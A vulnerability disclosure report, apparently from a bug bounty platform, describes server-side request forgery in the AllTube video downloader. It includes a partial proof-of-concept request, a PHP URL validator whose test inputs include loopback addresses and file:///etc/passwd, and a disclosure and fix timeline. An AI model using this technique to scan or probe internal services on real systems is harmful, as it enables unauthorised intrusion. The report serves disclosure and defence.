Server-Side Request Forgery (SSRF) in rudloff/alltube


Reported on

Feb 26th 2022


Alltube takes the URL from the query parameter and uses it directly in the youtube-dl command. As a result, any unauthenticated attacker can perform an SSRF attack by passing internal hostnames in the URL parameter and obtain information about that service from the response.

Proof of Concept

GET /alltube/index.php/info?url= HTTP/1.1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
Accept-Encoding: gzip, deflate
Accept-Language: en-US,en;q=0.9
Cookie: PHPSESSID=qcnp4gcfj3ni5c02u60ivovj0l
Connection: close



This vulnerability allows internal port scanning, obtaining sensitive information about services on localhost, and sending requests to them.
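A pre-flight check for the URL parameter described above, as an added example: it is not AllTube's code and not the fix merged upstream. The function name `isFetchableUrl`, the `$resolver` parameter and the sample hostnames and addresses are assumptions made for this illustration.

```php
<?php
// Added example: decide whether a user-supplied URL may be handed to the
// downloader. $resolver is a hypothetical injection point (hostname -> list
// of IP strings) so the demo at the bottom runs without network access.
function isFetchableUrl(string $url, ?callable $resolver = null): bool
{
    $parts = parse_url($url);
    if ($parts === false || !isset($parts['scheme'], $parts['host'])) {
        return false;
    }
    // Only web schemes; this rejects file://, gopher://, ftp:// and similar.
    if (!in_array(strtolower($parts['scheme']), ['http', 'https'], true)) {
        return false;
    }
    // parse_url() keeps the brackets around IPv6 literals, so strip them.
    $host = trim($parts['host'], '[]');
    if (filter_var($host, FILTER_VALIDATE_IP) !== false) {
        $ips = [$host];
    } else {
        $resolver ??= static fn (string $h): array => array_merge(
            array_column(@dns_get_record($h, DNS_A) ?: [], 'ip'),
            array_column(@dns_get_record($h, DNS_AAAA) ?: [], 'ipv6')
        );
        $ips = $resolver($host);
    }
    // Every resolved address must be public: one loopback, private or
    // link-local record is enough to refuse. Unresolvable hosts are refused.
    $flags = FILTER_FLAG_NO_PRIV_RANGE | FILTER_FLAG_NO_RES_RANGE;
    foreach ($ips as $ip) {
        if (filter_var($ip, FILTER_VALIDATE_IP, $flags) === false) {
            return false;
        }
    }
    return $ips !== [];
}

// Constructed sample data: fake DNS records and URLs for the demo.
$records = ['video.example' => ['93.184.216.34'], 'intranet.example' => ['10.0.0.5'],
            'mixed.example' => ['93.184.216.34', '127.0.0.1']];
$fakeDns = static fn (string $h): array => $records[$h] ?? [];
foreach (['https://video.example/watch?v=1', 'http://127.0.0.1:8080/', 'http://[::1]/',
          'http://intranet.example/', 'http://mixed.example/', 'file:///etc/passwd'] as $u) {
    printf("%-34s %s\n", $u, isFetchableUrl($u, $fakeDns) ? 'allow' : 'refuse');
}
```

The downloader resolves the hostname again and follows redirects on its own, so this check narrows the exposure without closing it; egress filtering on the host running the downloader is still needed.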

We are processing your report and will contact the rudloff/alltube team within 24 hours. 3 months ago
We have contacted a member of the rudloff/alltube team and are waiting to hear back 3 months ago
Pierre Rudloff modified the report 3 months ago
Pierre Rudloff validated this vulnerability 3 months ago
Anna has been awarded the disclosure bounty
The fix bounty is now up for grabs
Pierre Rudloff confirmed that a fix has been merged on 148a17 3 months ago
The fix bounty has been dropped
DownloadController.php#L46 has been validated